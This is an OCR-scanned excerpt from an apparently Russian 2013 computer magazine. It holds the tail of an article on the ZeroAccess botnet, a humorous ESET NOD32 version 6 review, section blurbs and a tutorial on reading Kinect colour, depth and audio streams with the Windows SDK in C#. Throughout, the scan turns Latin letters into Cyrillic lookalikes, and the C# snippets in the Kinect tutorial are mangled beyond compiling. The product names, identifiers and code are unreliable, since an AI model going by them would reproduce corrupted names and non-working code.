за третий квартал 2012 года говорится уже о 2,2 миллиона за- 
раженных систем, из которых 685 тысяч (31 %) находятся в США. 
По мнению экспертов, ботнет на основе 2егоАссе88 был самым 
активным в 2012 году. 

В свете этих цифр, думаю, уже ни у кого не осталось со- 
мнений, что 2егоАссе8 — это не ноль без палочки. Пусть Ріпд 
о уже и не используется, но «Ассезз» к вычислительным мощ- 
ностям ничего не подозревающих пользователей продолжает 
приносить злоумышленникам кучу вечнозеленых американских 
бумажек. А это значит, антивирусным компаниям есть над чем 
работать. Читателям же хочется в очередной раз напомнить — 
спасение вашего железного друга от троянской напасти полно- 
стью на вашей совести, будьте бдительны. иС 



Александр Лозовский 

І020ѵзкѵ@геаІ.хакер.ги 



БРАТСТВО 

НОД 




ШЕСТАЯ ВЕРСИЯ АНТИВИРУСНОЙ 
ЛИНЕЙКИ ОТ Е8ЕТ: ЗТАЯТ РАСК, 
НОВАЯ СИСТЕМА ЛИЦЕНЗИРОВА- 
НИЯ И МНОГОЕ ДРУГОЕ 

За что мы любим N0032? Во-первых, Алек- 
сандр Матросов из Е8ЕТ пишет нам отличные 
статьи. Во-вторых, Александр не читает эту 
рубрику и поэтому никогда не узнает о том, 
что мы иногда прогуливаем гонорары. Ну 
и в-третьих, антивирусное ПО от Е5ЕТ — само 
по себе отличное. Посмотрим, что же принес- 
ла нам его новая, шестая версия. 



ЗАКУПАЕМСЯ 

Лично Я по-прежнему предпочитаю покупать ПО на дисках и в боль- 
ших коробках. Так я по крайней мере чувствую, за что именно я пла- 
чу деньги :). Однако двадцать первый век диктует свои требования, 
он заставляет вендоров идти на поводу у компьютерных маньяков, 
которые хотят покупать софт (и даже игрушки!) через эти ваши ин- 
тернаты. 

А еще современный пользователь хочет быстроты, дешевизны, 
удобства и гибкости настройки. И Е5ЕТ дает ему все перечисленное. 
План действий таков. 

В интернете ты покупаешь базовый пакет Е5ЕТ N0032 Зіагі Раск. 
Стоит он дешевле даже малоизвестных антивирусов (менее 1000 ру- 
блей), а содержит в себе антивирус, антишпион, антифишинг и кон- 
троль съемных носителей (кстати, крутая штука; может создавать 
белые и черные списки носителей по серийному номеру) и по своей 
сути является «антивирусом» (не содержит файрвола). Купив одну 
лицензию, ты внезапно порадуешься ее кросс-платформенности — 
после активации лицензии Е8ЕТ Антивирус или ЕЗЕТ Зтаіі Зесигііу 
можно дополнительно загрузить и установить продукты ЕЗЕТ 
СуЬегзесигіІу для 03 X и ЕЗЕТ Антивирус для Ыпих Оезкіор. Лицен- 
зия распространяется на защиту всех операционных систем (М3 
ѴѴіпсІоѵѵз, ОС X и Упих), вне зависимости от того, установлены они 
на одном устройстве или на разных. 

А что делать, если вдруг базовой защиты тебе окажется недоста- 
точно? Идти в магазин за больщой блестящей коробкой с надписью 
ЕЗЕТ ЗтаП Зесигііу? Да! Хотя погоди, товарищи из ЕЗЕТ передают, 
что ходить никуда не надо, даже если очень хочется. Новый сер- 
вис «Управление лицензиями» позволяет апгрейдить «антивирус» 
до Зесигііу с доплатой или пропорциональным уменьщением вре- 
мени действия лицензии. На аналогичных условиях можно доку- 
пить ЕЗЕТ МоЬіІе Зесигііу и вообще совершить любую метаморфозу 
с продуктами от ЕЗЕТ на вполне человеческих условиях. 

УСТАНОВКА 

Тут все традиционно: 

изегасісі пос132 && ^гоирасісі пос132 

ссі ПОСІ32-0.86.1/ 

./сопІіЕиге -ргеЯх=/изг 
таке іпзііаіі 

сЬомп -К ПОСІ32 /и5г/5Ьаге/пос132 

Хотя нет, погоди, это же мои фантазии. На самом деле установка 
под винду ничем не примечательна — запускаем, на все соглашаем- 
ся, решаем, нужно ли нам участвовать в облачном сервисе от ЕЗЕТ, 
опять соглашаемся. Это все, ребута по окончанию установки не тре- 
буется. 

РАБОТАЕМ 

N0032 всегда был знаменит быстротой, малозаметностью и мини- 
мал истинным интерфейсом. Все эти достоинства сохранились в но- 
вой версии программы. Например, пользователей ноутов он теперь 
может порадовать не только скоростью работы, но и автоматиче- 
ским переходом в режим экономии энергии. Разумеется, антивирус 
в полной мере выполняет все возложенные на него задачи: опреде- 
ляет и блокирует опасные ссылки в интернете, проверяет все ска- 
чиваемые файлы на наличие вредоносного кода и шпионского ПО, 
а кроме того, оснащен модулем «Безопасность в социальных сетях», 
сканирует учетную запись в РасеЬоок и проверяет все сообщения 
на наличие вредоносных ссылок и вирусов. 

ЗАКЛЮЧЕНИЕ 

Новая версия N0032 достойна того, чтобы ее купить, — особенно 
на ноутбук, нетбук или компьютер твоей подружки (охраняет ком- 
пьютер тихо, не отягощая пользователя лишними вопросами). А гиб- 
кая система лицензирования поможет, если ты вдруг надумаешь 
расширить защиту или обеспечить свой андроидофон антивирусом. 
Удачи! НС 



Ргѳѵіѳѵѵ 




ПОДУШКА БЕЗОПАСНОСТИ 



Ты любишь ломать. Но больше всего ты любишь 
ломать собственную систему. Или не лю- 
бишь — но так уж оно всегда выходит. Дело 
в том, что перед тем, как проводить над своим 
пингвином эксперименты, которые бы заставили 
покраснеть и доктора Менгеля, нужно подсте- 
лить правильную соломку. И в Ыпих этой соломки 
много. Поговорим о том, как запускать процессы 
в изолированном окружении, работать со снап- 
шотами файловой системы В!г1з, а также созда- 
дим раздел для восстановления всей системы. 
Ну, знаешь, на случай если соломка не поможет. 




7 СТОЛПОВ ыыих 

Поговорим о том, что происходит под капотом 
в современных версиях ядра Ыпих. Самые важ- 
ные и удачные компоненты рассмотрены со всех 
мыслимых сторон. 




ПОГРАНИЧНЫЙ ЗАСЛОН 

Обеспечиваем работникам безопасный до- 
ступ во всемирную паутину с помощью пакета 
УзегОа^е Ргоху & РігеѵѵаІІ 6.0 и оставляем себе 
максимум возможностей для контроля. 



^^3 кодинг 




КОДИМ ДЛЯ КІНЕСТ ПОД ѴѴІНООѴѴ8 

Если ты давно следишь за ][, то наверняка уже 
вспомнил, что про разработку для Кіпесі мы 
когда-то уже писали. Что ж, многое изменилось, 
но это по-прежнему очень круто. 




8УН/АСК 




ИСПЫТАНИЕ ГОСТЯМИ 

Делаем публичный ѴѴі-Рі-хотспот с одновремен- 
но простой и надежной авторизацией. Для этого 
придется поближе познакомиться с технологией 
Сарііѵе РогШІ. 




кодинг 




СЕРИАЛИЗАЦИЯ БЕЗ НАПРЯГА 

Учимся передавать большие структуры данных 
без написания кучи лишнего кода. В этом нам 
поможет ргоіоЬиТ от разлюбимой «корпорации 
добра». 




НОВЫЕ ГОРИЗОНТЫ 

Мы любим пдіпх. Мы рассказывали тебе о его на- 
стройке все, что только можно. Мы брали интер- 
вью у создателя, Игоря Сысоева. Что еще можно 
рассказать о нем? Оказывается, многое. 





юг 



Кодинг 



ХАКЕР 04/171/2013 




В художественном фильме «Бегущий человек» 
показывают тетку, которая занимается фитне- 
сом перед телевизором (в аккурат перед тем, 
как к ней вломится Шварц). Думаешь, у нее есть 
Кіпесі? Нет, в ее будущем нет Кинекта! Она про- 
сто занимается гимнастикой перед обычным 
телевизором. А у нас, в настоящем будущем, 
есть Кинект. И мы научимся его программить. 

И никакой Шварц за это к нам не вломится! 



Подслушиваем, подсматриваем 
и записываем через Кинект. 

И это только начало! 



Юрий «уигетЬо» Язев 

уа20У8о!1®атаП.сот 



КОДИМ для КІМЕСТ 
ПОДѴѴІМООѴѴ8 



С пустя шесть дней после того, как МісгозоЙ выпу- 
стила Кинект для ХЬох (в ноябре 2010-го), он был 
разгрызен хитрыми хакерами, и первая ореп зоигсе 
библиотека для работы с Кинект на ПК ІіМгеепесІ 
была выложена в открытый доступ. 

Через месяц израильская компания РгітеЗепсе начала ра- 
боту над открытыми проектами — наборами драйверов для Ки- 
некта: ОрепМІ и МІТЕ. На этом стоит заострить внимание: из- 
начально МісгозоЙ лицензировала у РгітеЗепзе устройство 
с двумя камерами и инфракрасным источником света и для по- 
лучения из него Кинекта (вначале — Рго]ес1 Маіаі) добавила 
четыре микрофона, поскольку имела большие наработки в об- 
ласти распознавания голоса. И только в июне 2011 -го был выпу- 
щен официальный Кіпесі ЗОК от МісгозоЙ. Естественно, он стал 
самым популярным среди разработчиков, поскольку включает 
поддержку всех средств Кинекта и при этом бесплатен для ис- 
пользования в исследовательских целях. 

Первый раз я познакомился с Кіпесі ЗОК год назад, тогда 
еще с версией 1 .0. В то время про нее на самом деле нечего 
было рассказывать, но сегодня мы имеем версию 1 .6, и в ней 
уже есть чем полакомиться. 

ЭКИПИРУЕМСЯ 

Главное различие между Кіпесі Тог ХЬох и КіпесТ Тог ѴѴіпЬоѵѵз 
заключается в расстоянии от сенсора до игрока: с Кинек- 
том для бокса можно взаимодействовать на расстоянии от 80 
сантиметров до 4 метров, тогда как с Кинектом для ПК можно 
управляться уже на расстоянии 40 сантиметров. Если выйти 
за указанные пределы, то мы попадем в слепую зону и сенсор 
не будет реагировать на жестикуляцию игрока. Вдобавок Кинект 
для ѴѴіпбоѵѵз способен определять движения каждого пальца. 



На протяжении статьи я буду использовать Кіпесі ^ог ХЬох по одной простой 
причине: его стоимость сравнительно меньше, чем Кіпесі Іог ѴѴіпЬоѵѵз, к тому же 
его легче достать, одолжив у владельца ХЬох. Чтобы использовать на компе сен- 
сор, предназначенный для консоли, понадобится адаптер для подключения к УЗВ- 
слоту, поскольку у Кинекта отличный от ІІЗВ штекер — кроме стандартных четырех 
контактов ІІЗВ, он добавочно имеет 12-вольтовый контакт для обеспечения пита- 
ния двигателя камеры. Такой переходник можно купить в магазине или сделать 
самостоятельно. 

ВЫБИРАЕМ ИНВЕНТАРЬ 

В случае использования ЗОК от МісгозоЛ можно работать с уже привычными 
тулзами. Я буду кодить под ѴѴіпсіо\л/5 7 и пользоваться ѴізиаІ ЗШЬіо 2010, но никто 
не запрещает брать более новые версии продуктов, тем более что их поддержка 
была добавлена в последнюю версию ЗОК. Кроме того, понадобится последняя 
версия .МЕТ Ргатеѵѵогк — 4.5. Безусловно, потребуется Кіпесі ЗОК Ьг ѴѴіпсІоѵѵз, 
последняя версия на момент написания статьи была 1 .6. Для некоторых приме- 
ров из данного набора ЗОК (в частности, для тех, что написаны на С++), нужен 
ОігесІХ ЗОК. 

Для работы с Кіпесі ЗОК можно использовать управляемые и неуправляе- 
мые языки. К числу первых относятся ѴВ.МЕТ и С#, а ко второй категории — С++. 
По сложившейся традиции мы будем кодить на С#. Сначала надо установить драй- 
веры для Кинекта (файл Кіпес!ЗОК-ѵ 1.6-3е1ир.ехе), затем набор средств разра- 
ботчика (Кіпесі Оеѵеіорег ТооІкі1-ѵ 1 .6-ЗеШр.ехе), включающий сэмплы и полез- 
ные утилы. Никаких подводных камней в процессе установки нет, чтобы избежать 
лишних проблем, надо просто соблюсти порядок инсталляции компонентов. Если 
перед этим у тебя были установлены какие-то драйверы для Кинекта или МісгозоЙ 
ЗреесЬ, то их надо предварительно удалить. Заметь, что ЗреесЬ мог быть установ- 
лен с другими продуктами МісгозоЙ, поэтому перепроверь его отсутствие. После 
процедуры инсталляции драйверов будет отображен список успешно установлен- 
ных драйверов (см. рис. 2). Первая строчка относится к драйверу адаптера, и, если 
ты используешь Кинект для ПК, ее не будет. 
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Кодим для Кіпесі под \А/іпсіо\а/8 







Дополнительно, начиная с версии 1.5, в состав тулкита 
для Кинекта была включена интересная тулза — Кіпесі Зіисііо 
(рис. 3). Главная ее особенность состоит в записи и воспроиз- 
ведении потоков данных, поступающих с сенсора, это помогает 
в отладке, так как позволяет прокручивать записанные сценарии 
много раз. Если просто запустить ее, то она ничего не отобра- 
зит. Сначала необходимо запустить любое другое приложение, 
которое инициализирует Кинект. Уже после к этому приложению 
можно подключиться из рассматриваемой тулзы, и тогда она бу- 
дет выводить данные. Как видно на скрине, в одном окне прога 
выводит видео с обычной камеры, во втором — с камеры глуби- 
ны, в третьем на основе глубины строит перспективу. 

ПОТОКИ КИНЕКТА 

Теперь от абстрактных размышлений, конструктивных фактов 
и фундаментальных основ можно перейти к разработке своих 
программ с помощью Кіпесі Іог ѴѴіпсІоѵѵз ЗОК. Обычно прило- 
жения, взаимодействующие с Кинектом, призваны отображать 
графическую информацию, поэтому для ее вывода использует- 
ся ѴѴРР и/или ХМА. Кинект преобразует данные об окружающем 
пространстве в три потока: видео, глубины и аудио. 

Видеопоток 

Первое наше приложение будет выводить то, что видит Кинект 
(в цветном формате). Для начала в студии создай ѴѴРР-проект. 
К вновь созданному проекту подключим сборку из Кіпесі ЗОК. 
Открой диалог ее добавления (Рго]ес1 — ► Абб Реіегепсе), в нем 
перейди на вкладку «Вгоѵѵзе» и добавь сборку МісгозИ. Кіпесі. 
бІІ из папки (по умолчанию): С:\Ргодгагп РіІез\МісгозоИ 30Кз\ 
Кіпес1\ѵ1 .6\АззетЫіез. Добавь в код ссылку на пространство 
имен: изіпд МісгозоЙ.КіпесІ;. Создадим элемент для вывода 
видео. Сенсор может передавать данные в следующих форма- 
тах: 640 X 480 X 32 (РОВ), 1280 х 960 х 12 (РОВ), 640 х 480 х 15 
(ѴиѴ). Хотя самый компактный из них последний, мы восполь- 
зуемся первым. В таком случае, так как по цветовому каналу 
от Кинекта получаем изображение в формате 640 х 480, рас- 
ширим окно, а на него поместим объект Ігпаде данного размера 
(см. проект КіпесіЗігеатСоІог на диске): в ХАМ Ь разметку до- 
бавь такую строчку: <1таде Мате="кіпес10и1ри1" НеідИ1="480" 
Ѵ\/іб1Іі=’’640'7>. После этого создай событие Іоаб объекта клас- 
са МаіпѴѴіпбоѵѵ. В нем проведем инициализацию объекта, при- 
крепленного к Кинекту. Но до этого его надо объявить, в начале 
класса напиши: КіпесІЗепзог кіпесі;, плюс на будущее нам по- 
надобятся еще два объекта. Во-первых, нам нужен буфер, где 
мы сможем хранить массив пикселей, полученный с сенсора: 
Ьу1е[] соІогОаІа = пиІІ; во-вторых, нужен объект, на котором мы 
будем рисовать данными из массива, им послужит объект клас- 
са ѴѴгіІеаЫеВіІтар. Вернувшись к обработчику события, напи- 
ши в нем такой код: 



3 Установка драйверов 



Устройство ГОТОВО к использованию 

бепегіс 11$В НиЬ Готово 

Кіпесі (ог \А/іпсіоѵѵ5 Оеѵісе ^ Готово 

Кіпесі ^ог ѴѴіпсІои^ С атега ^ Г отово 

Кіпесі Іог УЛпсіот Аисііо СоШгоІ ^ Готово 

Составное Ц$В устройство ^Готово 

Кіпесі ^ог 1Л/ІПСІОМ/5 Аисііо Аггау СопігоІ ^ Г отово 

Кіпесі (ог \^іпсІо^5 $есигііу СоШгоі ^Готово 

Кіпесі 058 Аисііо ^ Готово 
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Рис. 1 . КіпесТ 

ТЕХНОЛОГИЯ КШЕСТ 



Давай посмотрим на сенсор снаружи и за- 
глянем под его корпус. Внутри имеется две 
камеры, источник инфракрасного света и на- 
бор из четырех микрофонов. Одна из камер 
снимает обычное цветное видео в ВСВ- 
формате с разрешением 640 на 480 со ско- 
ростью обновления 30 кадров в секунду. 
Источник инфракрасного света накладывает 
на находящееся перед сенсором простран- 
ство сетку хаотично расположенных точек. 
Благодаря этому вторая, ІВ (инфракрасная) 
камера, также называемая камерой глубины, 
считывает объем пространства и находя- 
щиеся в нем объекты. Эти данные обраба- 
тываются встроенным в Кинект процессо- 
ром: путем вычисления расстояния между 
точками определяется объем и расстояние 
до объектов, и далее информация пере- 
дается на хостовую машину (ХЬох 360 или 
РС) для основательной обработки. Четыре 
микрофона в точности позволяют определить источник звука в помещении. Опре- 
делением голосовых команд, равно как и жестов, занимается софт на машине, 
к которой подключен сенсор. Основная возможность Кіпесі — это способность 
выделять находящихся перед ним людей (до шести) среди остальных предме- 
тов окружения. Собственно, эта возможность и позволяет использовать Кинект 
для управления играми. Реализуется она с помощью софта, расположенного 
на хост-машине, который декодирует данные о глубине, полученные от Кинекта. 
Софт может выделить тело из очень широкого диапазона необходимых состав- 
ляющих: две руки, две ноги, тело, голова и так далее. К слову, это была основная 
проблема, поставленная перед МісгозоЙ РезеагсИ. Чтобы откалибровать Кинект, 
пользователю надо принять Т-позу. В то время (2009 год) софт для Кинекта 
различал 48 суставов, однако такое количество оказалось явным избытком, 
поэтому в финальной версии софта имеем только 20 суставов, соединяющих 19 
костей, чего вполне достаточно. Наконец, чтобы различать разные по форме тела 
(в общем числе их получилось 12), МБР обратилась в Голливуд, где специально 
проходили съемки бегающих, прыгающих и выполняющих трюки актеров. 




кіпесі; = КіпесІЗепзог. Кіпес1:5еп5ог5[0]; 
кіпесі .СоІогЗігеат. ЕпаЫе( ); 
кіпесі. 5іагі(); 

кіпесі. СоІогРгатеКеасІу += пем ЕѵепіНапсІІег*-' 
<Со1огІтабеРгатеРеасІуЕѵепіАг85>(кіпесі_Со1огРгатеКеасІу); 

В первой строчке мы берем первый подключенный к компу сенсор; пока не бу- 
дем принимать во внимание то, что может быть подключено больше одного Ки- 
некта. Затем включаем передачу цветового потока. Он как раз является обычным 
видео. В качестве параметра можно передать формат, в котором мы хотим полу- 
чать видео, в ином случае будет использоваться формат по умолчанию. Третьей 
строчкой по факту включаем Кинект. Затем регистрируем событие, которое про- 
исходит в момент, когда очередной кадр пришел с сенсора и готов для обработки. 
Обрати внимание: здесь я опустил проверки на ошибки. Например, вполне вероят- 
ная ошибка может заключаться в отсутствии у пользователя подключенного к ком- 
пу Кинекта. В таком случае никакие дальнейшие действия проводить не стоит, надо 
сразу завершить выполнение приложения. 

Дальнейшее развитие событий разумно направить в описание обработчи- 
ка кіпес1_СоІогРгатеРІеасІу. Тело обработчика начинается с конструкции изіпд, 
в которой с помощью вызова метода ОрепСоІогІтадеРгате объекта класса 
СоІогІтадеРгагпеРеасІуЕѵепІАгдз, передаваемого в метод в качестве параметра 



Рис. 2. Драйверы Кіпесі 
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Рис. 3. Кіпес(8(исііо 



И содержащего сведения о кадре, возвращается сам фрейм — 
объект класса СоІогІтадеРгате. Этот объект после использо- 
вания должен быть уничтожен, поэтому его получение и проис- 
ходит внутри конструкции изіпд. Затем этот объект проверяется 
на равенство пиІІ, если так, то прекращаем выполнение метода. 
Такое может произойти, если фрейм еще не готов. Далее объ- 
явленному ранее массиву байт задается размер, равный длине 
фрейма, — соІогРгате.РіхеЮаІаІепдШ. Следующим действи- 
ем функцией СоруРіхеЮа^аТо объекта класса СоІогІтадеРгате 
пиксели фрейма копируются в байтовый массив. Далее, если 
Ьіітар — ссылка на объект класса ѴѴгіІеаЫеВі^тар, объявленно- 
го в начале класса, равняется пиІІ, значит, объект не создан и его 
необходимо создать при помощи конструктора данного класса. 
Объект принимает шесть параметров: ширина и высота (берут- 
ся от соответствующих данных — членов фрейма), количество 
точек на дюйм по горизонтали и вертикали, формат пикселей и 
палитра. Палитра в данном случае не нужна — передаем вместо 
нее пиІІ, а формат пикселей — обратный общепринятому, ВОР. 
Между прочим, он прекрасно поддерживается и не требует пре- 
образования. После создания этого объекта с помощью его ме- 
тода ѴѴгіІеРіхеІз происходит запись в него пикселей из байтового 
массива. Метод принимает четыре параметра: прямоугольная 
область (объект класса 1п^32Рес1) для копирования, буфер-ис- 
точник, в нашем случае массив байт, размер копируемого буфе- 
ра, шаг для обновления — в нашем случае 0. Последним дей- 
ствием передаем получившийся битмап на вывод для элемента 
управления класса Ітаде. В конце работы приложения при за- 
крытии окна надо остановить Кинект командой кіпес1.8Юр();. 

Минимум действий выполнен, можешь откомпилить и по- 
смотреть результат. Обрати внимание: некоторые программы 
для Кинекта не работают под дебаггером! 

Для удобства работы с Кинектом хорошей идеей будет до- 
бавить возможность изменить угол обзора камеры. Добавь 
в разрабатываемую прогу две кнопки (см. на диске проект 
Кіпес^ЗігеатСопІгоІ). Первая из них будет служить для на- 
клона Кинекта кверху, вторая, соответственно, книзу. Заметь, 



Кстати, для удобства работы 
хорошей идеей будет добавить 
изменить угол обзора камеры 



что для добавления дополнительных объектов в ХАМЬразметку надо создать кон- 
тейнер, в который и поместить Ітаде и два Вийоп’а. Например, в качестве такого 
контейнера может служить ЗіаскРапеІ. Далее создай обработчик нажатия на пер- 
вую кнопку. Предположим, что нам надо изменять наклон на пять градусов, в этом 
случае для кнопки «Вверх» напиши: кіпесІ.ЕІеѵаІіопАпдІе += 5;, чтобы осуществить 
наклон книзу, надо просто изменить знак. В результате приложение сможет изме- 
нять угол обзора (по оси X), наклоняя камеру. Р. 5. Или я пересидел, или это дей- 
ствительно напоминает Валли. И звук такой же :). 

Поток глубины 

Для вывода данных с камеры глубины нам потребуется внести некоторые измене- 
ния в наш прошлый проект. Сделай его копию, и начнем. 

Первым делом надо изменить поток получаемых данных, который назначается 
в событие загрузки формы, то есть изменить СоІогЗІгеат на ОерШЗІгеат: кіпес^ 
Оер1И81геат.ЕпаЫе();. Вместе с этим измени тип и имя регистрируемого на по- 
лучение данных с Кинекта события: кіпесІ.Оер^ИРгатеРеасІу += пеѵѵ ЕѵепШапсЛег 
<0ер1ІіІтадеРгатеВеасІуЕѵепІАгд8>(кіпес1_0ерІІіРгатеРеас1у):. Соответственно 
измени заголовок обработчика: в прошлом проекте мы получали данные, кото- 
рые было удобно хранить в массиве байт, поскольку один пиксель описывался 
32 битами: по байту на каждый из трех цветов + байт на альфа-канал, а сейчас 
от камеры глубины мы будем получать данные в другом формате. Формат этот 
подразумевает, что каждый пиксель здесь представлен 13 битами, таким обра- 
зом, ближайший к этому размеру имеет тип збогі, содержащий 16 бит. Следо- 
вательно, надо объявить массив данного типа: з1юг^[] сІерШОаІа = пиІІ;. Между 
тем эти 3 бита не будут пропадать, поскольку в них записывается идентификатор 
игрока, попадающего в камеру. Как уже было сказано, Кинект позволяет разли- 
чать до шести тел, но связанный скелет он строит только для двух из них. Но тема 
настоящего разговора не о скелетах, поэтому мы будем просто сдвигать эти 3 
бита. При этом старый массив типа Ьуіе остается нужен для хранения формиро- 
вания итогового изображения глубины. Итак, перейдем в обработчик получения 
данных и изменим его. Начало функции должно подвергнуться лишь изменению 
типа данных с Ьуіе на због!. После копирования пикселей фрейма в массив глу- 
бины: сІерІІіРгате.СоруРіхеЮаІаТо(сІерІІіОаІа): мы инициализируем массив байт 
размером, равным длине фрейма, умноженной на 4. Далее нам нужна перемен- 
ная, которая будет указывать на определенный пиксель во фрейме и на соот- 
ветствующую позицию в массиве, так как их размеры одинаковы. Следующим 
действием запустим цикл по пикселям фрейма, чтобы узнать их значение. Пер- 
вым делом в цикле, взяв значение элемента массива глубины, который, по сути, 
равен фрейму, сдвигаем 3 бита, тем самым оставляя 
только значение глубины. После этого мы можем прове- 
рить его. Кинект не всегда в состоянии правильно опре- 
делить значение глубины (причиной этого может стать 
выходящее за пределы расстояние между сенсором 
и объектом управления), в таком случае в пиксель запи- 
сываются предопределенные значения. Существует три 
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таких значения, И в зависимости от него наша прога красит 
пиксель определенным цветом. Если значение глубины равно 
УпкпоѵѵпОерШ (неопределенная глубина), пиксель закраши- 
вается красным: сІерШСоІогІтаде[сІер^ІіСоІогІтадеРо5++] 
= 255;. Обрати внимание: в этой строчке кода, используя 
постфиксный инкремент, мы присваиваем значение текуще- 
му байту и сразу же переходим на следующий. Если значе- 
ние глубины равно ТооРагОерІИ (слишком далеко), пиксель 
закрашивается синим, а если значение равно ТооМеагОерІІі 
(слишком близко), то зеленым. В ином случае, если значение 
глубины не равно никакому предопределенному значению, 
значит, в нем содержатся полезные данные. И в последней 
ветке условного оператора мы, преобразовав это значение, 
присваиваем его каждому байту пикселя. Обработка заклю- 
чается в следующем. Мы имеем значение глубины размером 
13 бит, этого много для цвета, поэтому надо отбросить 5 бит. 
В таком случае мы будем иметь недостаточную точность, поэ- 
тому можно сдвинуть только 4 бита. Теперь это значение надо 
вычесть из 255, поскольку данное значение будет слишком 
ярким, а его вычитание из максимального значения позволит 
получить обратный результат, то есть серый, и данный ре- 
зультат будет значением компонента цвета для пикселя. По- 



Аудиосенсор Кинекта позволяет записать іб-бит- 
ный звук с частотой і 6 ооо герц в секунду. Не СО 
(там частота 44 іоо герц), но тоже неплохо 



еле того как весь цветовой массив глубины будет заполнен, 
на его основе происходит создание и/или обновление объек- 
та класса ѴѴгіІеаЫеВіІтар, который затем выводится на фор- 
му. Не буду повторяться, описание этого процесса приведено 
в предыдущем проекте. 

Аудиопоток 

Для демонстрации возможностей Кинекта работы со звуком на- 
пишем прогу, которая будет сохранять звуковой поток в файл, 
а затем по команде пользователя воспроизводить его. Про- 
игрывание звука осуществим стандартными средствами ѴѴРР. 

Аудиосенсор Кинекта позволяет записать 16-битный звук 
с частотой 16 000 герц в секунду. Это, конечно, не звук с ком- 
пакта (там частота 44 100 герц), но все равно довольно высокое 
качество. Кстати, четыре встроенных микрофона Кинекта не за- 
писывают многоканальный звук. Множество микрофонов ис- 
пользуется для определения и удаления шумов из звука, а так- 
же для определения расположения его источника. 

Создадим новое ѴѴРР-приложение. На форме размести две 
кнопки: Пес и РІау. Также на будущее нам понадобится компо- 
нент МесІіаЕІетепІ для проигрывания звука. Нам будут нужны 
следующие глобальные переменные: объект Кинекта, строка — 
имя файла и буфер для временного хранения звука, размером 



«время продолжительности (5 секунд), умноженное на частоту (16 000)». В методе 
загрузки формы нам надо только получить первый Кинект и стартовать его рабо- 
ту, никакие потоки в данном случае привязывать не надо. Не забудь остановить 
Кинект во время завершения работы. Для простоты будем сохранять звук в ѴѴАѴ- 
файле — это самое простое средство для хранения звука, которое есть в ѴѴіпсІоѵѵв, 
так как на диск в данном случае без всякой обработки записывается область па- 
мяти. Для приличия к ним присоединяется заголовок (см. исходник). Этот код 
не представляет собой ничего нового, поэтому я не буду тратить на него время 
и место. Теперь напишем обработчик события нажатия на кнопке «Нес», размести 
в нем такой код: 

11 (Рі1е,Ехі5Т5(-Рпате)) Рі1е.0е1е1:е(-Рпате); 

ТЬгеасІ зоипсІТІігеасІ = пем,ТЬгеа(^(пем ТЬгеасІЗТагТСсарТигеБоипсІ)) ; 

5оипсІТІігеасІ.Ргіогі1:у = ТИгеафРгіогіТу .Ні&I^е51:^ 

5оипс1Т|ігеас|. І5Васк§гоипсІ = Тги.е; 

5оипсІТІігеасІ . 51;агТ( ) ; 

В первой строке проверяем, существует ли файл с таким именем, если да, 
то удаляем; во второй строке создаем параллельный поток и привязываем к нему 
выполнение функции сарШгеВоипсІ, передавая ссылку на нее конструктору пото- 
ка в качестве параметра. Таким образом, должны передаваться функции, не при- 
нимающие и не возвращающие аргументов, как в нашем случае. Затем задаются 
свойства потока: назначается наивысший приори- 
тет выполнения среди потоков данного прило- 
жения, свойство ІзВаскдгоипсІ в значении Ігие 
гарантирует завершение дополнительного потока 
вместе с родительским процессом, в ином случае 
пришлось бы предусматривать прекращение вы- 
полнения данного потока при завершении работы 
приложения. Последним оператором прога запу- 
скает поток. 

Как только начинается его выполнение, он сразу вызывает функцию 
сарШгеЗоипб. Далее приведен ее код и описание: 

51:геат кіпес1:АисІіо51:геат = кіпес-Ь ѵАис1іо5оигсе.51аг1(); 
кіпесІіАисІіоБ-Ьгеат. Реаа(5оипсІ5атр1еВи11'ег^ 0 ^ 5оипсІ5атр1еВи-р-Рег.«-- 
Іеп^ІЬ); 

и.5іп^ (ѵаг 51е51;геат =_пеы Рі1е51:геатС-Рпате, РіІеМосІе.Сгеа-Ііе)) 

{ 

кІгі1:е1лІаѵНеасІег(61е5-Ьгеат^ гесогсІВи-Р-Рег); 



51е5-1:геат.ІлІгі1:е(5оипс15атр1еВи-Р-Рег^ 0, 5оипсІ5атр1еВи-р-Рег. Іеп§1:Іі); 

} 

Сначала запускается прием звуковых данных с Кинекта, плюс метод 8іаг1 возвра- 
щает ссылку на принимаемый поток. Обрати внимание на разницу: видеоданные пе- 
редавались Кинектом последовательно — кадр за кадром (со скоростью 30 кадров 
в секунду), тогда как звук передается непрерывно — потоком. Следующим операто- 
ром программа читает данные из приходящего потока и помеіцает их в массив байт, 
от его начала заполняя по всей длине. Далее в конструкции изіпд безопасно, с га- 
рантией закрытия, создается файл, и в этот файл сперва записывается стандартный 
заголовок ѴѴАѴ-файла, а затем сами данные из байтового массива. 

В итоге файл под именем ѵѵаѵе.ѵѵаѵ сохраняется в папке с экзешником. При на- 
жатии кнопки «РІау» производится проверка на его существование, при успешном 
раскладе срабатывает такой код: 




рІауег.Боигсе =.лем Цгі(1'пате^ ЦгіКіпсІ.Ке1а1:іѵе0гАЬ5о1и1:е) ; 
ріауег. ІоасІесІВеИаѵіог = МесІіаБІіаІе. РІау; 

где ріауег — это объект класса МесІіаЕІетепІ: здесь указывается путь к файлу и за- 
дается действие, выполняемое при успешной его загрузке, то есть его проигры- 
вание. Еще один важный момент: когда проигрывание файла завершается (через 
5 секунд), свойство Зоигее объекта ріауег обнуляется (происходит в событии), что- 
бы освободить файл. Это необходимо для дальнейшей работы программы, потому 
что она не сможет удалить и/или заменить используемый файл. 

ИТОГИ 

Нам удалось затронуть лишь малую часть возможностей Кіпесі іог ѴѴіпсІоѵѵз ЗОК. 
Правда, часть эта очень значительна, ведь она играет важную роль в работе устрой- 
ства. Мы рассмотрели все три присутствующих в Кинекте потока данных. Однако 
рамки статьи не позволили нам глубже окунуться в программирование для Кинек- 
та — за бортом осталась еще масса материала: слежение за телом, обработка ске- 
лета, распознавание голосовых команд, слежение за лицом, определение жестов, 
реагирование на них и другое. А ведь все это довольно сложные темы, требующие 
отдельного изучения. Данная статья изначально задумывалась как вводная, и бу- 
дем надеяться, что я останусь в здравом уме и трезвой памяти после ее написания, 
а редактор выделит мне место под следующую :). ^ 



Рис. 4. Вывод глубины 



СЕРИАЛИЗАЦИЯ 
БЕЗ НАПРЯГА 
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НА САМОМ ДЕЛЕ ЗДЕСЬ ТОЛЬКО 
ПРО РРОТОВОР, ВЕДЬ У НИХ 
МИЛЛИАРДЫ! 




Все программы работают с 
данными. Эти данные надо где- 
то хранить и иногда куда-нибудь 
передавать. Для того и другого 
придумали много полезного. 

Но вот часто в самой программе 
мы работаем с этими данными 
совсем в другом виде и нам 
